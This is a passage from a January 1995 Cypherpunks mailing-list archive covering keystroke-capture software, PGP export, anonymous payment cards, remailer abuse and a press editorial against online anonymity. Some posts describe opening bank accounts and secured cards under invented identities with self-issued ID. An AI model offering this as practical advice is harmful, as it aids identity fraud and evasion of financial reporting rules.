password theft. We decided that the benefit to the consumer of having this utility available to save data outweighed the obvious danger of password and text theft. The problem increases, though, if one is not aware that Last Resort is installed. 
The Read Me file on the distribution disks has a discussion of this problem (as well as the problem of people snarfing your files when you share your disk to the whole company or campus), and there is a way to disable key capture temporarily, for password entry. I'm not real happy with the ease one can sneak Last Resort onto someone's machine, but I take a little ironic solace in knowing that similar programs that are "more hidden" than LR are available in source code form from Phrack, at least for DOS. On the plus side, I have gotten many, many letters, e-mails and phone calls from people who say it saved their butts when a piece of critical information would have been lost. I had the habit of taking customer orders over the phone while in the middle of debugging a program (like Last Resort!) and would frequently crash before the order could be saved or printed. LR saved my company real money in this case. David Pogue's book _Hard Drive_ is based in part on Last Resort, in that a key capture utility is used to recover a password that saves the world. I was quite tickled by this. I'm sad to say, though, that I know of one case in which Last Resort precipitated the end of a relationship, in which a fellow discovered the love letters his girlfriend had e-mailed to someone else in his Last Resort files. This particular fellow was glad that he found out about it, but I still feel a twinge of guilt when I think about it. I certainly support any effort made to document the existence of these programs. I might suggest that one way to defend against them would be to watch for the patching of certain system calls - patching GetNextEvent or installing a jGNEFilter on the Mac, and warning the user if this happens. 
It's easy to detect such patching; for the most part it will be innocent, but a hacker who had a fair amount of Mac programming knowledge could make a keystroke capture program in an evening of work, so attempting to catalog them all will provide only moderate protection against them. BTW... most of those other commercial keystroke capture programs (no names here) are clones of Last Resort. Some of them even had the gall to use our logo in their advertising (in a claim they were better than us). LR might not do as much as some of them, but I know that it is more reliable than the competitors I have tested. So if you are going to actually _use_ a key capture program for your own (legitimate!) use, consider getting The Real Thing, the One True Key Capture Program, the Saviour of Data: Last Resort. I don't work for WSI any more, but we remain friends, and they can be reached at: Working Software, Inc. PO Box 1844 Santa Cruz, CA 95061-1844 (408) 423-5696 (800) 229-9675 (408) 423-5699 FAX working at scruznet.com 76004.2072 at compuserve.com Cheers, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From jamesd at netcom.com Mon Jan 2 18:39:55 1995 From: jamesd at netcom.com (James A. Donald) Date: Mon, 2 Jan 95 18:39:55 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: Message-ID: On Mon, 2 Jan 1995, Carol Anne Braddock wrote: > Right now, I don't think U.S. Customs is going to ask you if you > have PGP in your PC if you leave the country, or return either. > > They should, and I'd be proud to say yes. Well Carol, I am sure your heart is in the right place, but I do not agree. They should not, and I'd be deranged to say yes. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. 
True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Mon Jan 2 18:57:12 1995 From: jamesd at netcom.com (James A. Donald) Date: Mon, 2 Jan 95 18:57:12 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: <199501021725.AA09061@bolero.rahul.net> Message-ID: On Mon, 2 Jan 1995 nobody at rahul.net wrote: > Doesn't Matt's experience really show simply that not enough people try > to follow the rules, [...] > > [...] > > I could see a system where you routinely fill out and have your card > stamped when you check your luggage to show that you are carrying crypto. > Then you turn it in when you come back. [...] How does this > advance the CP cause? Exactly so. Surely we are better off with a system that does not work. Furthermore, with the current system, entropy works in our favor. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From yusuf921 at uidaho.edu Mon Jan 2 21:36:57 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Mon, 2 Jan 95 21:36:57 PST Subject: Appolgy to P. Zimmerman Message-ID: Mr. Zimmerman, I would like to take this opportunity to publicly apologize to Mr Zimmerman (the primary author of PGP). In a post to the internet I criticized Mr. Zimmerman for taking a short route to legalize PGP short term rather than directly attack Public Key Partners' so-called patent of public encryption. I would like to apologize, as I have now been presented with the opportunity for a business venture requiring encryption of data I realize that we don't all have the legal resources to be mavericks and challenge patents. Some of us need encryption now and it's only a matter of time before PKP's patents fall.
--Syed Yusuf From rogaski at phobos.lib.iup.edu Tue Jan 3 00:19:29 1995 From: rogaski at phobos.lib.iup.edu (Mark Rogaski) Date: Tue, 3 Jan 95 00:19:29 PST Subject: HACK - EFH Presents Free PGP Encryption Workshop (fwd) Message-ID: <199501030819.DAA29763@phobos.lib.iup.edu> -----BEGIN PGP SIGNED MESSAGE----- Just thought you may be interested in this. Anybody ever hear of this EFH group? It's nice to see somebody making PGP a little easier for the average jane/joe end-user-type to use. - From the node of FringeWare Daily: : : Sent from: Jon Lebkowsky @io.com : : >From: robbiew at inviso.com : >Summary: January 14, 3:00 PM, SCCSI offices in Houston : >Keywords: Houston EFH PGP Workshop : : Electronic Frontiers Houston : presents a : Free Cryptography Workshop: : How to use Pretty Good Privacy : (PGP) : presented by Paul Elliott : 14 January 1995 3PM : : : It has become apparent that the data super highway is not safe. Messages : traveling the data highway can be hijacked by sinister data interlopers. : : After six months of unpaid labor, in June, 1991 Philip Zimmermann : released his controversial freeware program Pretty Good Privacy (PGP). : Just as Prometheus' liver was eternally chewed by eagles for the crime : of bringing fire to mankind, Philip Zimmermann's liver is now being : chewed by the Federal Eagle (The U.S. Custom Service) for the alleged : crime of releasing strong cryptography to the world. : : As a result of Philip Zimmermann's contribution, you can use the widely : available freeware program PGP to send electronic-mail messages to : anyone in the world, in complete privacy! In addition you can send : authentication with your messages so that the recipient can verify that : the message really came from you. You can encrypt sensitive files on : your computer so that the files remain private even if your computer and : disks are stolen. 
: : In this free workshop, our presenter Paul Elliott will show you how you : can use PGP effectively, easily, and intelligently. PGP is available for : most popular computers and Operating Systems, including MSDOS, UNIX, MAC : and OS/2 among many others. : : The Workshop will take place at on January 14, at 3:00 PM at the : offices of South Coast Computing located at 1811 Bering, Suite 100. Park : in the garage, and ignore the "contract only" sign. Enter through the : back door (adjacent to the garage) and use the house phone (dial 100) if : the door is locked. : : : | Augusta | Bering | Chimney Rock | 610 Loop West ^ : | | | | | : | | | | N : ----+-----------+-----------+----------------+---- San Felipe : | |* SCCSI | | : | | | | : ----+-----------+-----------+----------------+---- Westheimer : | | | | : | | | | : ----+-----------+-----------+----------------+---- 59 South (SW Fwy) : | | | | : | | | | : : : For more information call (713)799-1044 or : email efh at blkbox.com : : -- : Robbie Westmoreland robbiew at inviso.com : Electronic Frontiers Houston announcement : : : : : : -- : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= : Jon Lebkowsky FringeWare, Inc. jonl at fringeware.com : URL http://fringeware.com/staff/jonl/jonl.html voxmail 512-444-2693 : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= : : : : : - ----- Mark Rogaski a.k.a. Doc "I used to think that my brain was the rogaski at phobos.lib.iup.edu best part of my body ... but then I http://www.lib.iup.edu/~rogaski/ remembered who was telling me this." 100,000 lemmings can't be wrong! - Emo Phillips >>>>>finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1<<<<< Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer... 
From rah at shipwright.com Tue Jan 3 05:18:10 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 3 Jan 95 05:18:10 PST Subject: Anonymous payment scheme Message-ID: At 1:21 PM 1/2/95, Hal wrote: >I'm not sure what you do in this situation if they ask to see some ID >when you try to use the card. This would be rather embarrassing, it >seems to me. Sorry, I guess I left my drivers license in my other >pants... Or, never mind, try this card. That other one was from before I >changed my name... Why not, "It's a pseudonym."? Looks like an evangelistic opportunity to me. Pseudonyms can't be illegal, or Mark Twain and Bob Dylan would have written from prison. ;-). I also don't believe that you are legally required to produce ID for a credit card purchase. That was the point about those pictures on the front of Citibank cards. Citicorp did that to get around the legal restrictions on demanding ID to cope with the much larger issue of fraud. Most (smaller) vendors hardly check the signature on the back, much less validating it against a state ID, however. Hmmm. What if you produced a pseudonym card *with* your picture on the front? I smell a market opportunity. Or not... >And personally, I am more concerned about the >bank and gov't tracking my spending patterns than whether the guy I buy >gas from knowing my name. The bank has a lot more information about me >which is much more threatening to my privacy. A nom de guerre VISA or >debit card does not seem to help this problem. Indeed.
Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From bmorris at netcom.com Tue Jan 3 07:42:27 1995 From: bmorris at netcom.com (Bob MorrisG) Date: Tue, 3 Jan 95 07:42:27 PST Subject: Anonymous payment scheme In-Reply-To: <199501022121.NAA07411@jobe.shell.portal.com> Message-ID: <199501031542.HAA11629@netcom11.netcom.com> HH> So, you may be able to have a form of anonymity from the person you ar HH> transacting with, but I don't think you can be anonymous from the bank HH> and from the government. And personally, I am more concerned about th With a debit card you can't be anonymous, because your money resides in the bank. With digital cash, and the ability to transfer money to another digital cash card via phone lines, I don't see how they can successfully trace everything. They will try, no doubt. From blane at seanet.com Tue Jan 3 08:15:04 1995 From: blane at seanet.com (Brian Lane) Date: Tue, 3 Jan 95 08:15:04 PST Subject: Anonymous payment scheme In-Reply-To: <199501031542.HAA11629@netcom11.netcom.com> Message-ID: On Tue, 3 Jan 1995, Bob MorrisG wrote: > HH> So, you may be able to have a form of anonymity from the person you ar > HH> transacting with, but I don't think you can be anonymous from the bank > HH> and from the government. And personally, I am more concerned about th > > With a debit card you can't be anonymous, because your money resides in > the bank. With digital cash, and the ability to transfer money to > another digital cash card via phone lines, I don't see how they can > successfully trace everything. They will try, no doubt. I don't see why a debit card couldn't be anonymous, even to the point of having no name, AND no picture on it. 
Yes, the bank has the money, but their only obligation is to dish it out to the vendors/ATMs that you have used your card with. Why should a bank care who you are once they have your money in the account. As to avoiding fraud with the card, is it really that huge of a problem? As long as no one copies the number (could go so far as no embossed number. Just a gloss black card with a hologram of a Bald Eagle on the front of it), and you don't lose the card how can someone use your account? I think that this anonymous debit card would be a good first step towards anonymous digital cash. You still couldn't exchange digital cash with your buddy in Taiwan, but it would work for converting to physical cash (Which I still like, and is the best anonymous cash around right now). Anyone here adept enough at finance to write a proposal for CitiCorp? :> How would they make their money off the cards? Annual fees, and vendor percentages I guess? Brian ------------------------------------------------------------------------------ "Everyone is a prisoner holding their own key." | finger blane at seanet.com -- Journey | PGP 2.6 email accepted ------------------------------------------------------------------------------ From frissell at panix.com Tue Jan 3 08:34:26 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 3 Jan 95 08:34:26 PST Subject: Anonymous payment scheme Message-ID: <199501031634.AA16432@panix.com> At 07:42 AM 1/3/95 -0800, bmorris at netcom.com wrote: >With a debit card you can't be anonymous, because your money resides in >the bank. With digital cash, and the ability to transfer money to >another digital cash card via phone lines, I don't see how they can >successfully trace everything. They will try, no doubt. Unless you open a bank account in a nom de guerre. In the Inter-mountain West and in small towns elsewhere, it is often possible even today to open a bank account with "soft ID." Such ID would include employment ID and student ID.
Since anyone can be an employer or a school, anyone can issue such soft ID. These items work very well if backed up with a secured VISA card from one of the many issuers. Some of the issuers of secure credit cards want references but many will issue their cards if your name comes up as having no credit record. Made up people are the most likely to have no credit history. Even though a VISA card is not meant to be ID, most people (even state DMV offices) treat it as ID. DCF ************************************************************************* ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail. From perry at jpunix.com Tue Jan 3 06:53:51 1995 From: perry at jpunix.com (John A. Perry) Date: Tue, 03 Jan 1995 08:53:51 -0600 Subject: retiring my remailer.. Message-ID: <199501031453.IAA02344@jpunix.com> The anonymous remailer at jpunix.com is going to shut down permanently shortly after I send this message. I spent my holidays fighting spams, running out of disk space because of spams and people sending HUGE binaries, and running out of swap space. I have come to the ultimate conclusion that the Internet is not mature or developed enough for remailers. The intended purpose has been completely ignored while abuse is growing almost geometrically on a daily basis. I have concluded that running a remailer on the Internet is like giving a bunch of terrorists a nuclear bomb and then telling them "But only use it for good!". There just doesn't seem to be much point in thrashing my disks and computer to aid somebody in net abuse. I hardly ever (never) see any use of the remailer for the purposes it was intended. BTW as I type this, mailgate.mail.aol.com is hammering my port 25 every 30 seconds. The contents of the spam being passed thru my system essentially says: THIS IS A MAIL BOMB!! **** BOOM *** See what I mean?? John A. 
Perry - KG5RG - perry at jpunix.com WWW - http://jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers. PGP-encrypted e-mail welcome! Finger kserver at jpunix.com for PGP keyserver help. Finger remailer at jpunix.com for remailer help. From db at Tadpole.COM Tue Jan 3 09:16:13 1995 From: db at Tadpole.COM (Doug Barnes) Date: Tue, 3 Jan 95 09:16:13 PST Subject: HACK - EFH Presents Free PGP Encryption Workshop (fwd) In-Reply-To: <199501030819.DAA29763@phobos.lib.iup.edu> Message-ID: <9501031715.AA08257@tadpole.tadpole.com> > > Just thought you may be interested in this. > Anybody ever hear of this EFH group? It's nice to see somebody making > PGP a little easier for the average jane/joe end-user-type to use. > Yes, many of the EFH founders have participated in EFF-Austin events. Steve Ryan, one of the EFH founders, spoke last week at HoHoCon (as did myself, Jim McCoy and Jeremy Porter.) I think the program is an excellent idea, and will be getting feedback from attendees with an eye to doing something similar here at some point. Doug From SADLER_C at HOSP.STANFORD.EDU Tue Jan 3 09:30:30 1995 From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler) Date: Tue, 3 Jan 95 09:30:30 PST Subject: EFF PGP Workshop Message-ID: <01HLEL9APM96000ONS@MR.STANFORD.EDU> Sure would be nice to have a PGP workshop in the Bay Area - any EFF members or others willing? Connie From hfinney at shell.portal.com Tue Jan 3 09:44:37 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 3 Jan 95 09:44:37 PST Subject: Anonymous payment scheme Message-ID: <199501031745.JAA09281@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: Brian Lane > I don't see why a debit card couldn't be anonymous, even to the point > of having no name, AND no picture on it. Yes, the bank has the money, but > their only obligation is to dish it out to the vendors/ATMs that you have > used your card with. Why should a bank care who you are once they have > your money in the account. 
Again, it is unclear here whether you are proposing that you would be anonymous to the bank or just have a blank card. As I wrote, banks are required to get SS#'s for depositors right now, and I wouldn't expect that to change any time soon. If anything, the trend appears to be towards more tightening rather than less. Duncan and/or Sandy have suggested giving a fake SS# when you open your secured account; maybe that would be legal but it sounds questionable to me.

> As to avoiding fraud with the card, is it really that huge of a
> problem? As long as no one copies the number (could go so far as no
> embossed number. Just a gloss black card with a hologram of a Bald Eagle
> on the front of it), and you don't lose the card how can someone use your
> account?

I used my VISA yesterday, and after swiping it through the now-ubiquitous card readers the vendor was required by the machine to manually enter the last four digits on the card. He complained that this was something new and was happening very frequently now (maybe a change with 1995?). I have heard of fraud where people make fake VISA cards (or steal them) and re-program the mag stripe to have a different number than what is on the front. Maybe this is a countermeasure for that. It doesn't sound like a blank card is the direction the industry is going. Does anyone have more info on this change?

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLwmNFBnMLJtOy9MBAQF4gAH7BgHuNzraGdAujkbnStXf9knBUYCKiJZv
zodiYtbEFAKuuPUIT/aqyM1L7IPRbMuNMSW9hmel3k11g9ATHy+doA==
=n71e
-----END PGP SIGNATURE-----

From jamesd at netcom.com Tue Jan 3 09:51:56 1995
From: jamesd at netcom.com (James A. Donald)
Date: Tue, 3 Jan 95 09:51:56 PST
Subject: Press attack on anonymity.
Message-ID:

Yesterday an "opinion" article appeared in the SF Chronicle, written by some unimportant person who knew absolutely nothing about the internet.
Today a similar, but better informed article, appeared in many newspapers, originating from the New York Times.

Articles written for newspapers are written to survive arbitrary truncation, hence key points first, lesser points later.

The interesting thing is that the two articles, despite different authors, had equivalent key points, implying that some single higher authority gave out a list of points to be made, but left the headline and overall spin to the columnist.

Indeed, when one reads beyond the key points that were equivalent in both articles, it is as if one suddenly encounters a different journalist. There is an abrupt change of tone and style when one reads from the uniform part to lesser points.

The key points in both articles are that the government should do something coercive to stop anonymity on the internet, and that there is widespread support for such a move.

Note that since both articles are obviously tentacles, there is a mysterious and anonymous powerful person -- the single higher authority of which I spoke earlier -- who is anonymously attacking anonymity.

In my opinion when a mysterious anonymous and powerful voice proclaims that the government should coerce someone, it is usually the government speaking -- a government department with guns is running up a trial balloon.

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.

James A. Donald
jamesd at netcom.com

From jya at pipeline.com Tue Jan 3 09:55:13 1995
From: jya at pipeline.com (John Young)
Date: Tue, 3 Jan 95 09:55:13 PST
Subject: NYT on MEMS
Message-ID: <199501031755.MAA07431@pipe1.pipeline.com>

Malcolm Browne has longish article today on MEMS and current mathematical and engineering research on their use to control turbulence -- in planes, ships, submarines, blood, water, flatulence.

For email copy send blank message with subject: MEM_tug

From danisch at ira.uka.de Tue Jan 3 10:08:20 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:08:20 PST
Subject: Phil's Plight
Message-ID: <9501031808.AA21529@elysion.iaks.ira.uka.de>

> I think Phil deserves better than the
> silence his plight has received as of late.

True. But would it be good or bad help if something other than silence came from outside the USA? I mean if the rest of the world says they love him, the attorney will say "yes, of course. Therefore he gets sued." :-(

Hadmut

From cactus at seabsd.hks.net Tue Jan 3 10:08:25 1995
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Tue, 3 Jan 95 10:08:25 PST
Subject: GUI: PGP vs novices
Message-ID: <199501031814.NAA24428@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article , Dave Del Torto wrote:
>The Cypherpunks should really launch a new list oriented toward novices
>with basic questions. It could be a Web page with a question form, or even
>an email address for the Web-challenged (I may do it, but I welcome any
>offers to help). As an incentive to Cypherpunks, their friends and
>colleagues and members of the general public, I'm hereby offering to spend
>some time answering questions for novice users at either:
>
> or
> .

I attempted to set something like this up about 7 months ago. I got so little interest that I never set up the mailing list.
Better than a single person's address, I'd suggest a pgp-help mailing list for all interested folks, just as the flexfax list works for flexfax users and commercial products have their own lists.

I just set up a list on pgp-help at hks.net, and I'll place pgp-questions at lsd.com on the list (assuming you won't object). Anybody else who's interested, send me mail at pgp-help-request at hks.net. I don't have the list of folks who volunteered last time, so this'll be fresh.

- - --
Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus at hks.net | scornful tone, 'it means just what I choose it to mean -
cactus at bb.com | neither more nor less.'" - Lewis Carroll

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwlY4hNhgovrPB7dAQEBvQQA1vxwGcYZ28qlytX3jrY95WN/L11X1FG2
MGwWjjk8BZ2cXk1uvLWtuhoNGwzqhup/aGLVGuPo2QjFPiqwjoA5pa+9+8093dpl
tBMziDmJ5/Pg3jWirRiuuREa5Ki977I/uplp3Ysh0ioz07Ws44susZrcdDHbIChL
TYKrC1DROi4=
=GbTI
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwmT2yoZzwIn1bdtAQFvxwGAgkaHPEh2A7NuPXJgtNBNqV4j9KrnLbex
az8jQmFpTfBaAbLPfP5i7tdVPjJ21xom
=yR+4
-----END PGP SIGNATURE-----

From danisch at ira.uka.de Tue Jan 3 10:10:03 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:10:03 PST
Subject: Why I have a 512 bit PGP key
Message-ID: <9501031809.AA21532@elysion.iaks.ira.uka.de>

> A compiler can recognize one specific piece of code or a few
> specific pieces of code and do something perverse. It cannot
> recognize functionally equivalent code, this
> being a high order artificial intelligence problem.

It's enough to recognize DES tables or PGP procedures.
Hadmut

From sandfort at crl.com Tue Jan 3 10:11:53 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 3 Jan 95 10:11:53 PST
Subject: Anonymous payment scheme
In-Reply-To: <199501022121.NAA07411@jobe.shell.portal.com>
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 2 Jan 1995, Hal wrote:

> . . .
> There are a couple of issues here. One is whether you could get a
> debit card with another name printed on it than your own. Sandy
> Sandfort and some others have suggested here that this would be legal
> and possible already as long as you don't do it with the intention to
> commit fraud. You can open a secured account by mail and give a false
> name.
> Opening an account in the US without ID is very difficult
> I'm not sure what you do in this situation if they ask to see some ID
> when you try to use the card. This would be rather embarrassing, it
> seems to me. Sorry, I guess I left my drivers license in my other
> pants... Or, never mind, try this card. That other one was from before I
> changed my name...
>
> The other issue is whether you could set up a payment system which did
> not require social security numbers from the participants. I think
> this is much more questionable. Although the phone cards and some
> other restricted usage systems are apparently legal, bank accounts seem
> to have many more restrictions. Barter and scrip systems are also
> heavily regulated. All these laws involving reporting requirements,
> etc., were passed to help the government track the flow of money.
> There is no way the government is going to make an exception at this
> point. In fact, I suspect that if the limited systems expanded to
> where they were used for general payments, the government would crack
> down. I recall reading that just such a crackdown occurred in Las Vegas
> when casino chips started to be accepted for non-gambling payments.
>
> So, you may be able to have a form of anonymity from the person you are
> transacting with, but I don't think you can be anonymous from the bank
> and from the government. And personally, I am more concerned about the
> bank and gov't tracking my spending patterns than whether the guy I buy
> gas from knowing my name. The bank has a lot more information about me
> which is much more threatening to my privacy. A nom de guerre VISA or
> debit card does not seem to help this problem.
>
> Hal
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6
>
> iQBVAwUBLwhuNRnMLJtOy9MBAQEkPQIAqEEglLxt8E4Rrgh7dR93fuCSJUI+UMgF
> 3XUrsTxM4whOejFMrluOAYM+2RdBOgYTk1mNEiAgSUPLLScIa9zU5A==
> =CF5G
> -----END PGP SIGNATURE-----
>

From danisch at ira.uka.de Tue Jan 3 10:20:27 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:20:27 PST
Subject: Why I have a 512 bit PGP key
Message-ID: <9501031819.AA21541@elysion.iaks.ira.uka.de>

> While it's likely that a sysadmin could hack the kernel to substitute
> bogus MD5 hashes, doing so in certain environments could earn the sysadmin a
> quick exit from employment.

If it wasn't the reason he was employed for.

In Germany it is not allowed to spy out someone else's phone calls. (Is it in the USA?) But some cases got public where employees of several companies got their phones tapped. It was done to find out whether they do private phone calls or what they say in private phone calls.

Hadmut

From sandfort at crl.com Tue Jan 3 10:20:33 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 3 Jan 95 10:20:33 PST
Subject: Exporting cryptographic materials, theory vs. practice
In-Reply-To:
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 2 Jan 1995, Alan Bostick wrote:

> . . .
> > Right now, I don't think U.S. Customs is going to ask you if you
> > have PGP in your PC if you leave the country, or return either.
> >
> > They should, and I'd be proud to say yes.
>
> And you can beam with pride as they impound your PC and take it away.
> Gosh. Sometimes it's just swell to be a cypherpunk. Kinda chokes me
> up. . . .

No reason to risk a hassle by exporting PGP from the US on your laptop, it's everywhere. Just take your Secret Keyring file and download PGP from a foreign FTP site once you are out of the US.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From danisch at ira.uka.de Tue Jan 3 10:34:08 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:34:08 PST
Subject: Stegno for Kids
Message-ID: <9501031834.AA21554@elysion.iaks.ira.uka.de>

> and Crayola brand
> secret writing pens (WOW!!!!). There are about 8 pens in the set. You write
> secretly with two of them and develop the image with the other six.

I had something like that as a toy about 20 years ago. A single pen with tips on both sides. One to write, the other to develop. Didn't they have it in America also?

Hadmut

From danisch at ira.uka.de Tue Jan 3 10:38:49 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:38:49 PST
Subject: Exporting cryptographic materials, theory vs. practice
Message-ID: <9501031838.AA21557@elysion.iaks.ira.uka.de>

What do I have to do if I want to bring cryptographic equipment _into_ the USA temporarily (for use or demo) and want to take it back home after some days or weeks?

Since I am in America then I am under American law. The _export_ of my own crypto stuff is not temporary. Does the American law allow me (a foreigner!) to take out any cryptographic material, even if it is my own thing?

Hadmut

From frissell at panix.com Tue Jan 3 10:47:10 1995
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 3 Jan 95 10:47:10 PST
Subject: Press attack on anonymity.
Message-ID: <199501031847.AA16557@panix.com>

At 09:51 AM 1/3/95 -0800, James A.
Donald wrote:
>Yesterday an "opinion" article appeared in the SF Chronicle,
>written by some unimportant person who knew absolutely
>nothing about the internet.
>
>Today a similar, but better informed article, appeared in
>many newspapers, originating from the New York Times.

The latter is presumably Peter Lewis' article on anonymity on the nets that appeared in the Saturday Times. It was not that negative about anonymity although it did seem to confuse spoofing with anonymity (since it talked about digital signatures as a response to "problems"). He did not advocate government intervention.

Since the Supremes have always supported anonymous speech, it seems unlikely that anonymity could be outlawed. Things like mandatory identification for net access (hard to enforce worldwide) would also seem to be a "government license for publication" which is what the 1st Amendment was specifically written to stop.

In any case, using companies as cutouts for such activities is trivial. Mandatory ID of any sort only goes back as far as the first entity which can be a company formed to block tracing.

DCF

*************************************************************************
ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail.

From foo.bar at baz.quux.com Tue Jan 3 10:54:25 1995
From: foo.bar at baz.quux.com (An annoyed user)
Date: Tue, 3 Jan 95 10:54:25 PST
Subject: Anon penet addresses
Message-ID: <9501031851.AA27170@toad.com>

To whomever keeps signing up penet addresses of the form "anXXXX" to cypherpunks: Cut it out. I've changed your address from the anXXXX to the naXXXX address. If you don't know why anXXXX is antisocial, I can tell you while flaming you for not understanding what you're doing.
From sandfort at crl.com Tue Jan 3 10:57:36 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 3 Jan 95 10:57:36 PST
Subject: SAN FRANCISCO EDITORIAL
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Here is a guest editorial that ran in Monday's SF Chronicle. It should make your blood boil.

S a n d y

* * *

ANARCHY, CHAOS ON THE INTERNET MUST END

Elections are over, and for better or worse, recognized leadership is installed and working in most places. Yet, in Cyberspace the electronic world dominated by the much-vaunted Internet, there is not much order. This huge international computer web tying together about 30 million people is governed by no one.

What an amazing state of affairs. The most powerful communications medium ever invented is being left to the equivalent of mob rule.

Last year was the year of the Internet in the media. Clearly it is now mainstream. Nonetheless, judging by what you read or hear, the key question of who runs it is not even an issue. It is more fun, after all, to contemplate shopping in an electronic mall or how to order a pizza through a modem. No matter, if you scratch the surface of this big, happy party, the need for firm direction is all too obvious.

Also reported in the press is an expanding array of Internet problems. Unregulated broadcasting of sexually explicit material that is readily available to children usually heads the list, but on-line sexual harassment, profanity, defamation, forgery and fraud run close seconds.

The secretiveness that computer communications allows is a special reason why abuse is easy. National and personal security are serious considerations when anyone can, with complete anonymity, send encrypted information worldwide via the Internet.
Such problems are further exacerbated by a computer located in Finland called the Anonymous Server, which exists for the sole purpose of laundering computer messages, much like dirty money is laundered through small island nations. Consequently, if you want to, say, threaten someone with death, your risk of retribution is small, courtesy of the Anonymous Server.

Nowhere are Cyberspace difficulties more evident than in the inevitable swing toward Internet commercialization. The widely reported turf war rages between academic factions that controlled the Internet before it went public and business newcomers who now want access to its huge audience. Electronic attacks on business people by means ranging from computer insults, called flames, to assorted forms of electronic vandalism, persist uncontrolled.

Worst of all are the ``canceller robots,'' computer programs meant to erase the communications of anyone the hackers who usually launch them wish to silence. These self-styled vigilantes routinely challenge free speech in Cyberspace unabated. Internet access providers, companies that connect people to the Internet for a profit, likewise assume the role of censors, arbitrarily closing accounts of those whom they disapprove.

Given its international nature, one obvious way to bring much needed order to the Internet is through diplomacy. The United States should lead in this. A good beginning might be to urge the Finnish government to deactivate the Anonymous Server. Diplomacy could also help to establish an international standard of recognizing laws existing at the point of origin as controlling the message sender. When conflicts arise, governmental diplomacy should again be the answer, just as it is with other trade and communications issues.

Next, laws already regulating behavior in the real world should be applied in Cyberspace. This is already taking place on a case-by-case basis, but the process is too slow.
The Supreme Court should act to create a precedent stating that crime is crime, even when the criminal instrument is a computer keyboard.

In the United States, legislation should be passed making Internet access providers common carriers. This will get them out of the business of censorship and under the guiding hand of the Federal Communications Commission.

People need safety and order in Cyberspace just as they do in their homes and on the streets. The current state of the Internet makes it clear that anarchy isn't working. If recognized governments don't find a way to bring order to the growing and changing Internet, chaos may soon dictate that the party is over.

----------
Martha S. Siegel is the author of ``How to Make a Fortune on the Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz.

* * *

